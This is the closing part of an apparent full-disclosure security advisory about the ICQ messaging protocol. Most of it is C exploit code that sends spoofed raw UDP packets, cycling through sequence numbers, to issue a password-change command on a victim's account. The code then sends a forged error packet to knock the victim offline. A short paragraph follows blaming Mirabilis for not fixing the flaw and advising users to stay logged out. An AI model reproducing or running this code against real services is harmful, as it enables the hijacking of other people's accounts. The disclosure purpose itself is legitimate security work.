            printf("*** Hijaaking account now...(*LONG* version)\n");
            for ( k = 0; k < 14 ; k++ ) {
                    for ( j = 0; j < 14 ; j++ ) {
                            int     psize;
                            icq_seq = k; icq_seq2 = j;
                            data_ptr = hdr_ptr + ICQ4_END;
                            WritePacket( data_ptr, &size, "S",argv[4] );
                            create_icq4_hdr(hdr_ptr, random()&0xFFFF,
                                    COMMAND_CHANGEPASSWORD, size );
                            hdr_size = ICQ4_END;

                            for ( i = 0; i < count ; i++ ) {
                                    psize = IP_END + UDP_END + hdr_size + size;
                                    make_ip_hdr( packet, psize, IPPROTO_UDP,
                                            0x666, 0, you, addr_list[i], 0x7F );
                                    make_udp_hdr( packet, psize - IP_END,
                                            your_port, 4000);
                                    err = sendto( rawsock, packet, psize, 0,
                                            &raddr, sizeof(raddr));
                                    if ( err != psize ) { perror("Sending");
                                            exit(-1); } usleep( 1000 );
                                    err = sendto( rawsock, packet, psize, 0,
                                            &raddr, sizeof(raddr));
                                    if ( err != psize ) {
                                    } } } }
            printf("Disconnecting the remote luser... \n");
            create_icq3_header(hdr_ptr, &hdr_size, RESPONSE_ERROR, 0, 0, icq_uin  );
            for ( i = 0; i < count ; i++ ) {
                    int     psize;
                    psize = IP_END + UDP_END + hdr_size;
                    make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0,
                            addr_list[i], you, 0x7F );
                    make_udp_hdr( packet, psize - IP_END, 4000,your_port );
                    err = sendto( rawsock, packet, psize, 0,
                            &raddr, sizeof(raddr));
                    if ( err != psize ) { perror("Sending"); exit(-1); } }
            free( addr_list );


    Mirabilis had a fair warning of this attack.  Unfortunately,  with
    the last four versions this has not been put into place.  It would
    seem the only way to  fix such grave problems with  their protocol
    is to air it in the public arena.

    There are no real workarounds for this problem, although there are
    some obvious workarounds to this exploit (left to the reader).  If
    you value  your ICQ  account, do  not log  into it  until a fix is
    available.  Otherwise, you can hope no one bothers to hit your UIN
    There are a huge number and you might be lucky.